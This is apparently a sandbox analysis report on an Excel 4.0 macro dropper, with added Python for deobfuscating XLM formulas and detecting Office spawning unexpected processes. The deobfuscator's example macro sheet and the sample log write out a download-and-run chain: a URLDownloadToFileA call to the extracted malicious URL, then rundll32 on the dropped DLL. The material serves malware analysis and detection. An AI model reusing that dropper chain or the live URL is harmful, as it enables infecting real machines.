General

  • Target

    343e8cd56fd9afa4dd1b2f7841a6c82c1e82f03d87fc4b234b96ae3de077456e

  • Size

    352KB

  • Sample

    230129-x3n1gaag36

  • MD5

    3aebf48834a573652d1b3f0351a6b15b

  • SHA1

    12cae410819cce11d119d5f19a51eee70e644d01

  • SHA256

    343e8cd56fd9afa4dd1b2f7841a6c82c1e82f03d87fc4b234b96ae3de077456e

  • SHA512

    0eb1a36c38b4f9b873901fb395fcd7438e06916393748f1023f563e22a67cee961e35a092f9ec5551b4cd136f5bf92a64efcadb757160a47bed027a2b81a63cb

  • SSDEEP

    6144:ATq1jURRRY1QzB8WTXgmKjNNt9MxBJd6E3MsUbsXmR6hSJi6qnS:ui1QzB8WTyjNpMesUbsXmR6hS06qnS

Score
10/10

Malware Config

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    https://powerdust.digital/g
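The `xlm40.dropper` source means the sandbox recovered that URL by emulating the workbook's Excel 4.0 (XLM) macro sheet rather than by string search: XLM droppers build their URL and download/EXEC calls out of CHAR() concatenations and cell references so the plain text never appears in the file. The following is an added example, not the sandbox's extractor and not code from the sample. It evaluates that string-building subset of XLM and pulls out URLs and EXEC() command lines. The macro-sheet formulas in MACRO_SHEET are constructed for illustration (the page shows only the recovered URL), and the names XlmSheet, split_top and extract_iocs are my own.

```python
"""Recover URLs and EXEC command lines from Excel 4.0 (XLM) macro formulas.

Added example, not the sandbox's extractor and not code from the sample:
XLM droppers hide strings behind CHAR() concatenation and cell references,
so the evaluator below resolves those before looking for indicators.
"""
import re

CELL_RE = re.compile(r'^\$?[A-Z]{1,3}\$?\d+$')
NUM_RE = re.compile(r'^-?\d+(\.\d+)?$')
CHAR_RE = re.compile(r'^CHAR\((\d+)\)$', re.IGNORECASE)
CALL_RE = re.compile(r'^([A-Z.]+)\((.*)\)$', re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r'https?://[^\s"\'<>),]+')


def split_top(expr, sep):
    """Split on `sep` only when outside double quotes and parentheses."""
    parts, cur, depth, quoted = [], [], 0, False
    for ch in expr:
        if ch == '"':
            quoted = not quoted          # XLM strings use no backslash escapes
        elif not quoted:
            if ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append(''.join(cur))
                cur = []
                continue
        cur.append(ch)
    parts.append(''.join(cur))
    return parts


class XlmSheet:
    """Evaluates the string-building subset of XLM found in droppers."""

    def __init__(self, cells):
        self.cells = cells               # {"A1": "=...", ...}, one macro sheet
        self._cache = {}

    def cell(self, ref, stack=()):
        ref = ref.replace('$', '').upper()
        if ref in self._cache:
            return self._cache[ref]
        if ref in stack or ref not in self.cells:
            return ''                    # cycle or missing cell: treat as empty string
        value = self.expr(self.cells[ref].lstrip('='), stack + (ref,))
        self._cache[ref] = value
        return value

    def expr(self, expr, stack=()):
        """Evaluate an '&'-joined chain of literals, CHAR(), cell refs and calls."""
        return ''.join(self.token(t.strip(), stack) for t in split_top(expr, '&'))

    def token(self, tok, stack):
        if len(tok) >= 2 and tok[0] == '"' and tok[-1] == '"':
            return tok[1:-1].replace('""', '"')   # XLM escapes a quote by doubling it
        m = CHAR_RE.match(tok)
        if m:
            return chr(int(m.group(1)))
        if CELL_RE.match(tok):
            return self.cell(tok, stack)
        if NUM_RE.match(tok):
            return tok
        m = CALL_RE.match(tok)
        if m:                                     # CALL()/EXEC()/...: resolve each argument
            name, args = m.group(1).upper(), m.group(2)
            if not args.strip():
                return name + '()'
            out = []
            for arg in split_top(args, ','):
                arg = arg.strip()
                if NUM_RE.match(arg):
                    out.append(arg)
                else:
                    out.append('"' + self.expr(arg, stack).replace('"', '""') + '"')
            return name + '(' + ','.join(out) + ')'
        return tok                                # anything else is passed through


def extract_iocs(cells):
    """Decode every formula and collect URLs and EXEC() command lines."""
    sheet = XlmSheet(cells)
    decoded = {ref: sheet.expr(formula.lstrip('=')) for ref, formula in cells.items()}
    urls = sorted({u for v in decoded.values() for u in URL_RE.findall(v)})
    execs = [m.group(1).replace('""', '"')
             for v in decoded.values()
             for m in [re.match(r'^EXEC\("(.*)"\)$', v)] if m]
    return {"urls": urls, "exec": execs, "decoded": decoded}


# Constructed macro-sheet contents (the real sample's formulas are not shown on the
# page); the URL is the one the sandbox recovered.
MACRO_SHEET = {
    "A1": '=CHAR(104)&CHAR(116)&CHAR(116)&CHAR(112)&CHAR(115)&"://powerdust.digital/g"',
    "A2": '="C:\\Users\\Public\\"&"wb.dll"',
    "A3": '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,A1,A2,0,0)',
    "A4": '=EXEC("rundll32.exe "&A2&",DllRegisterServer")',
    "A5": '=HALT()',
}

if __name__ == "__main__":
    for key, value in extract_iocs(MACRO_SHEET).items():
        print(key, value)
```

Running it on MACRO_SHEET yields the single URL plus the rundll32 command line; cell references that loop back on themselves resolve to an empty string instead of recursing forever, which matters because droppers often include junk cells that reference each other.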

Targets

    • Target

      343e8cd56fd9afa4dd1b2f7841a6c82c1e82f03d87fc4b234b96ae3de077456e

    Score
    10/10
    • Process spawned unexpected child process

      A child process was created that the parent does not start in normal use. This typically indicates the parent process was compromised via an exploit or a macro; for an Excel 4.0 (XLM) macro dropper like this sample, the parent is the Office application that opened the workbook and the child is whatever the macro launched.
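The same behaviour is what an endpoint detection rule looks for on a real host: an Office application as the parent of a process it has no reason to start. The following is an added example, not the sandbox's rule and not code from the sample. It runs that check over process-creation events shaped like Sysmon Event ID 1, with a small assumed baseline of legitimate Office children and a list of living-off-the-land binaries that raise the severity; the event lines in SAMPLE_LOG are constructed and not taken from this analysis, and the names check_event and scan are my own.

```python
"""Flag Office applications spawning child processes they do not create in
normal use, the behaviour behind the "Process spawned unexpected child
process" signature. Added example, not the sandbox's rule; the event lines
are constructed in the shape of Sysmon Event ID 1 (process creation) and
are not from the analysed sample.
"""
import json
import ntpath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Children an Office process may legitimately start (assumed baseline; tune per estate).
BENIGN_CHILDREN = {"splwow64.exe", "dw20.exe", "werfault.exe", "officeclicktorun.exe"}
# Living-off-the-land binaries XLM droppers typically EXEC(); any other unexpected
# child still fires, these only raise the severity.
HIGH_RISK = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
             "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path or "").lower()


def check_event(ev):
    """Return a finding dict for one process-creation event, or None."""
    parent, child = image_name(ev.get("ParentImage")), image_name(ev.get("Image"))
    if parent not in OFFICE_APPS or child in BENIGN_CHILDREN:
        return None
    return {
        "severity": "high" if child in HIGH_RISK else "medium",
        "parent": parent,
        "child": child,
        "pid": ev.get("ProcessId"),
        "cmdline": ev.get("CommandLine", ""),
    }


def scan(lines):
    """Run check_event over JSON-per-line events; malformed lines are skipped."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue                     # log noise should not abort the sweep
        finding = check_event(ev)
        if finding:
            findings.append(finding)
    return findings


# Constructed events: an XLS opened from Explorer, Excel running rundll32 on a DLL in
# a user-writable path, a benign print helper, an unrelated cmd.exe from Explorer,
# Word starting notepad, and one unparseable line.
SAMPLE_LOG = r"""
{"EventID":1,"ProcessId":4120,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"\"EXCEL.EXE\" invoice.xls"}
{"EventID":1,"ProcessId":4388,"Image":"C:\\Windows\\System32\\rundll32.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","CommandLine":"rundll32.exe C:\\Users\\Public\\wb.dll,DllRegisterServer"}
{"EventID":1,"ProcessId":4402,"Image":"C:\\Windows\\splwow64.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","CommandLine":"splwow64.exe"}
{"EventID":1,"ProcessId":4510,"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"cmd.exe"}
{"EventID":1,"ProcessId":4520,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"notepad.exe"}
not json at all
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f["severity"], f["parent"], "->", f["child"], f["cmdline"])
```

The rule deliberately fires on any unexpected child, not only the high-risk list, because a dropper can just as well launch a renamed or freshly dropped binary; the allowlist is what keeps the noise down, and it has to be derived from the estate's own telemetry rather than copied from here.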

MITRE ATT&CK Matrix

Tactic columns only; the report maps no techniques for this sample.

  • Collection
  • Command and Control
  • Credential Access
  • Defense Evasion
  • Execution
  • Exfiltration
  • Impact
  • Initial Access
  • Lateral Movement
  • Persistence
  • Privilege Escalation